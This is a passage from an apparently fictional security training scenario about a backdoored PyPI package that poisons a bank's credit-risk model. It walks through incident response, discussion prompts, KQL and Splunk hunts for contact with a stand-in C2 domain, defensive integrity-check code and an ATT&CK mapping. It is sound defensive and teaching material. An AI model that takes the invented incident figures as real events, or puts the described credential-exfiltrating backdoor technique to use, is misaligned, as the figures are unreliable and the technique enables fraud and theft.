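    every feature that differs beyond TOLERANCE or lacks a ground truth."""
    findings = []
    for rec_id, features in stored.items():
        truth = recomputed.get(rec_id, {})
        for name, value in features.items():
            expected = truth.get(name)
            if expected is None or abs(value - expected) > TOLERANCE:
                findings.append((rec_id, name, value, expected))
    return findings
```

Run continuously over a random sample per batch, a check like this would have surfaced the +0.08 to +0.15 credit-score shifts long before the drift monitor fired.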
Evidence Artifact -- Incident Response Actions:
[2026-04-01T12:00:00Z] IR-2026-0089: Incident declared - AI Model Poisoning
Severity: CRITICAL
Commander: CISO
Immediate Actions:
1. Model rollback: Reverted to credit_risk_v43 (last known clean)
2. Automated approvals: SUSPENDED for credit scores < 650
3. Manual underwriting: ACTIVATED for all loan types
4. Fraud hold: 847 loans matching poisoned profile flagged
- 213 already disbursed ($21.78M)
- 634 pending disbursement ($58.4M) -- FROZEN
5. ML pipeline: ISOLATED from network
6. Package audit: All ML dependencies hash-verified against known good
Containment:
7. Compromised package removed from all environments
8. Feature store: Clean snapshot restored from pre-compromise backup
9. C2 domain (cdn-analytics.example.com) blocked at firewall
10. All ML service accounts: Credentials rotated
Recovery:
11. Clean training data: Rebuilt from verified raw data sources
12. Model retrained on verified clean data: credit_risk_v50_clean
13. Enhanced model validation: Added adversarial robustness testing
14. Dependency pinning: All packages hash-pinned (pip --require-hashes)
15. Feature store integrity: Continuous comparison against raw sources
Discussion Inject 7 -- Investigative
The backdoored package was installed on January 15, but the model drift alert didn't fire until April 1 -- a 77-day gap. Trace the attack through all four phases and identify every point where detection could have occurred earlier. What monitoring capabilities were missing, and what would you prioritize implementing first?
Discussion Inject 8 -- Decision
Law enforcement wants to monitor the fraud network's remaining activity to identify more mule accounts, but the bank's regulators demand immediate disclosure and remediation. The 213 disbursed loans total $21.78M in potential losses. How do you balance the law enforcement investigation with regulatory obligations and customer notification requirements?
Detection Query -- KQL (Microsoft Sentinel):
// Retrospective hunt: identify all systems that contacted C2
CommonSecurityLog
| where TimeGenerated between(datetime(2026-01-14) .. datetime(2026-04-02))
| where DestinationHostName == "cdn-analytics.example.com"
or DestinationIP == "203.0.113.88"
| summarize FirstSeen=min(TimeGenerated), LastSeen=max(TimeGenerated),
TotalConnections=count(), TotalBytesSent=sum(SentBytes),
TotalBytesRecv=sum(ReceivedBytes) by SourceIP, DeviceName
| sort by FirstSeen asc
// Hunt for other compromised packages across all environments
DeviceFileEvents
| where TimeGenerated > ago(90d)
| where FileName endswith ".whl" or FileName endswith ".tar.gz"
| where FolderPath has "site-packages"
| summarize InstallCount=count(), Devices=dcount(DeviceName)
by FileName
| where InstallCount == 1 // Packages installed exactly once (potential typosquat)
| sort by FileName asc
Detection Query -- SPL (Splunk):
// Retrospective hunt: identify all systems that contacted C2
index=firewall sourcetype=pan:traffic
(dest_host="cdn-analytics.example.com" OR dest_ip="203.0.113.88")
earliest="01/14/2026:00:00:00" latest="04/02/2026:00:00:00"
| stats earliest(_time) as first_seen latest(_time) as last_seen
count as total_connections sum(bytes_out) as total_bytes_out
sum(bytes_in) as total_bytes_in by src_ip src_host
| sort first_seen
// Hunt for other compromised packages across all environments
index=endpoint sourcetype=syslog
(file_name="*.whl" OR file_name="*.tar.gz")
file_path="*site-packages*"
| stats count as install_count dc(host) as unique_hosts by file_name
| where install_count == 1
| sort file_name
Phase 5: Financial Impact & Fraud Recovery (Weeks 15-20)¶
ATT&CK Techniques: T1565.001 (Data Manipulation: Stored Data -- impact assessment)
The investigation quantifies the full financial and operational impact of the AI model poisoning campaign.
# Impact Assessment and Recovery (educational only)
# Financial Impact Summary:
# ┌─────────────────────────────────┬──────────────────┐
# │ Category │ Amount │
# ├─────────────────────────────────┼──────────────────┤
# │ Fraudulent loans disbursed │ $21,780,000 │
# │ Fraudulent loans frozen │ $58,400,000 │
# │ Expected recovery (disbursed) │ $3,200,000 │
# │ Net fraud loss │ $18,580,000 │
# │ Manual underwriting costs │ $2,400,000 │
# │ Incident response & forensics │ $1,800,000 │
# │ ML pipeline rebuild │ $4,500,000 │
# │ Regulatory fines (estimated) │ $12,000,000 │
# │ Customer notification costs │ $850,000 │
# │ Legal costs │ $3,200,000 │
# │ Reputation/business impact │ $14,670,000 │
# ├─────────────────────────────────┼──────────────────┤
# │ Total Estimated Impact │ $58,000,000 │
# └─────────────────────────────────┴──────────────────┘
# Recovery Actions (Weeks 15-20):
# 1. Full ML pipeline rebuild with security-by-design:
# - Software Bill of Materials (SBOM) for all ML dependencies
# - Hash-pinned requirements with automated vulnerability scanning
# - Feature store integrity monitoring (continuous raw-vs-processed comparison)
# - Model training provenance tracking (data lineage for every record)
# - Adversarial robustness testing in CI/CD pipeline
# - Red team exercises for ML pipeline quarterly
#
# 2. Enhanced model governance:
# - Monthly MRM reviews (was quarterly)
# - Cumulative drift monitoring (not just per-version)
# - Automated model rollback on drift threshold breach
# - Independent model validation by external team
# - Shadow model comparison (maintain parallel clean model)
#
# 3. Fraud detection improvements:
# - Real-time approval rate monitoring by risk bucket
# - Synthetic identity detection integration
# - Cross-institution fraud intelligence sharing
# - Manual underwriting trigger for anomalous model behavior
Impact Assessment¶
| Category | Impact |
|---|---|
| Fraudulent Loans Disbursed | 213 loans totaling $21.78M |
| Fraudulent Loans Frozen | 634 loans totaling $58.4M (prevented) |
| Net Fraud Loss | $18.58M (after $3.2M recovery) |
| Dwell Time | 77 days (supply chain compromise to detection) |
| Model Versions Affected | credit_risk_v44 through credit_risk_v49 (6 versions) |
| Training Records Poisoned | ~9,600 out of 10.8M (0.089%) |
| Total Financial Impact | $58M (fraud + remediation + fines + reputation) |
| Regulatory Impact | OCC enforcement action, enhanced MRM requirements |
| Recovery Timeline | 5 months for full ML pipeline rebuild |
Detection & Response¶
How Blue Team Should Have Caught This¶
Detection Strategy 1: ML Dependency Supply Chain Security
The initial compromise entered through a backdoored PyPI package. Organizations should implement hash-pinned dependencies (pip install --require-hashes), maintain an internal PyPI mirror with security scanning, generate SBOMs for ML environments, and monitor for unexpected package version changes. Automated binary analysis of all dependency updates would have detected the post-install hook and embedded payload.
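As a minimal sketch of that verification step, the snippet below checks a downloaded artifact against a locally pinned SHA-256 digest before it is allowed to install. The package name and digest are purely illustrative (the digest shown is the SHA-256 of an empty file), not a real package.

```python
import hashlib
from pathlib import Path

# Hypothetical pinned digests, as would appear in a hash-pinned
# requirements file. Filename and digest are illustrative only.
PINNED_HASHES = {
    "example-pkg-1.0.0-py3-none-any.whl":
        "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",
}

def verify_artifact(path: Path) -> bool:
    """Return True only if the artifact's SHA-256 matches its pinned digest;
    unknown packages are rejected by default."""
    expected = PINNED_HASHES.get(path.name)
    if expected is None:
        return False  # not in the pin list: reject
    return hashlib.sha256(path.read_bytes()).hexdigest() == expected
```

In practice the digests would come from a requirements file generated with a tool such as `pip-compile --generate-hashes`, and `pip install --require-hashes -r requirements.txt` enforces them at install time.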
Detection Strategy 2: Feature Store Integrity Monitoring
The attacker modified feature values during the transformation pipeline. Continuous comparison of processed features against independently calculated values from raw source data would detect discrepancies. Implementing "canary records" (known-good records with expected feature values) in every training batch provides a tamper-detection mechanism.
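The canary-record mechanism could be sketched roughly as follows; the record IDs, feature names, and tolerance are illustrative assumptions rather than PFG's real schema.

```python
# Canary records: known-good applicant records whose expected feature values
# are computed independently from raw source data (IDs/features are made up).
CANARIES = {
    "CANARY-001": {"debt_to_income": 0.32, "utilization": 0.45},
    "CANARY-002": {"debt_to_income": 0.18, "utilization": 0.12},
}

def check_canaries(processed_batch: dict, tolerance: float = 1e-6) -> list:
    """Return IDs of canary records that were dropped from the batch or whose
    processed feature values deviate from the expected values."""
    tampered = []
    for cid, expected in CANARIES.items():
        actual = processed_batch.get(cid)
        if actual is None:
            tampered.append(cid)  # canary missing from the batch
            continue
        for feature, value in expected.items():
            got = actual.get(feature)
            if got is None or abs(got - value) > tolerance:
                tampered.append(cid)  # feature altered in the pipeline
                break
    return tampered
```

Any non-empty result means the transformation pipeline changed values it should have passed through untouched, regardless of how small the attacker's statistical footprint is.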
Detection Strategy 3: Cumulative Model Drift Detection
Individual model versions passed quality gates, but the cumulative trend showed consistent degradation. Model monitoring should track cumulative drift over rolling windows, not just per-version deltas. Alert on sustained directional drift even when individual changes are within tolerance.
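A minimal version of that cumulative check might look like this; the window size and threshold are illustrative, not tuned values.

```python
def cumulative_drift_alert(deltas, cumulative_limit=0.05, window=6):
    """deltas: per-retrain change in a monitored metric (e.g. approval rate
    for a risk segment). Fires when the summed drift over the last `window`
    retrains exceeds the limit, even if every individual delta passed its
    per-version quality gate."""
    return abs(sum(deltas[-window:])) > cumulative_limit
```

With these numbers, six consecutive drifts of roughly +1 point each would fire the alert even though every single step would clear a 2-point per-version gate, while oscillating noise of the same magnitude would not.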
Detection Strategy 4: Approval Rate Anomaly Detection by Risk Segment
The fraud detection system eventually caught the anomaly through approval rate monitoring, but the alert threshold (25 percentage points) was too high. More granular monitoring by credit score bucket with lower thresholds (10 percentage points) and shorter lookback windows would have detected the pattern weeks earlier.
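A sketch of the per-bucket check with the lower 10-point threshold follows; the bucket labels and rates are invented for illustration.

```python
def approval_rate_anomalies(current, baseline, threshold_pp=10.0):
    """current/baseline: {score_bucket: approval rate in percent}.
    Return buckets (with their deltas) that moved more than threshold_pp
    percentage points from the trailing baseline."""
    return {
        bucket: round(rate - baseline[bucket], 1)
        for bucket, rate in current.items()
        if bucket in baseline and abs(rate - baseline[bucket]) > threshold_pp
    }
```

A subprime bucket jumping from a 22% to a 41% approval rate would be flagged immediately here, while the same 19-point swing averaged across all buckets might stay under a portfolio-wide 25-point threshold.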
Detection Strategy 5: Shadow Model Comparison
Maintaining a parallel "shadow" model trained on verified clean data and comparing its predictions against the production model would immediately detect decision boundary shifts. When the production model approves an application that the shadow model denies, that divergence should trigger investigation.
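The divergence check itself reduces to a simple comparison; the models are assumed here to be plain callables returning "approve" or "deny", standing in for whatever inference interface is actually in use.

```python
def divergent_approvals(applications, production, shadow):
    """Flag applications the production model approves but the shadow model
    (trained on verified clean data) denies; each divergence warrants
    manual review before funds are disbursed."""
    return [
        app for app in applications
        if production(app) == "approve" and shadow(app) == "deny"
    ]
```

Because the shadow model never ingests the production training pipeline's output, a poisoned decision boundary shows up as a growing divergence list rather than remaining invisible inside a single model's metrics.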
Lessons Learned¶
Key Takeaways
- ML pipelines are high-value attack surfaces with unique risks -- Traditional security controls (firewalls, EDR, SIEM) do not monitor for ML-specific attacks like training data poisoning, feature manipulation, or model drift. Organizations deploying ML for critical decisions must implement ML-specific security monitoring including feature integrity checking, model drift detection, and training data provenance.
- Supply chain attacks on ML dependencies can be devastatingly subtle -- A single compromised Python package can manipulate model behavior without triggering any traditional security alerts. The 0.089% poisoning rate was specifically designed to evade statistical detection thresholds. ML dependency management requires the same rigor as production software supply chains: hash pinning, SBOM generation, and automated binary analysis.
- Model governance cadence must match the threat tempo -- Quarterly model risk management reviews cannot detect attacks operating on weekly retraining cycles. Model governance should include continuous automated monitoring with human review triggered by cumulative drift, not just periodic scheduled reviews.
- The gap between data science and security teams creates blind spots -- PFG's ML infrastructure operated with minimal security team visibility. ML pipeline security requires joint ownership between data science and security teams, with shared monitoring, incident response procedures, and threat modeling exercises specific to ML attack vectors.
- Financial fraud detection must account for AI-era attack patterns -- Traditional fraud rules based on transaction patterns and velocity are insufficient when attackers can manipulate the decision-making model itself. Fraud detection must include model integrity monitoring as a first-class signal, not just transaction-level analysis.
- Canary records and shadow models provide defense-in-depth for ML systems -- Embedding known-good test records in training data and maintaining independent shadow models for comparison creates detection capabilities that are resilient to adversarial manipulation of monitoring thresholds.
MITRE ATT&CK Mapping¶
| Technique ID | Technique Name | Phase |
|---|---|---|
| T1195.002 | Supply Chain Compromise: Software Supply Chain | Initial Access (compromised PyPI package) |
| T1059.006 | Command and Scripting Interpreter: Python | Execution (backdoor in package post-install) |
| T1565.001 | Data Manipulation: Stored Data Manipulation | Impact (training data poisoning) |
| T1071.001 | Application Layer Protocol: Web Protocols | C2 (payload download and credential exfil) |
| T1567 | Exfiltration Over Web Service | Exfiltration (feature store credentials to C2) |
| T1027 | Obfuscated Files or Information | Defense Evasion (backdoor hidden in legitimate package) |
| T1070 | Indicator Removal | Defense Evasion (poisoning within statistical noise) |
| T1078 | Valid Accounts | Persistence (compromised PyPI maintainer account) |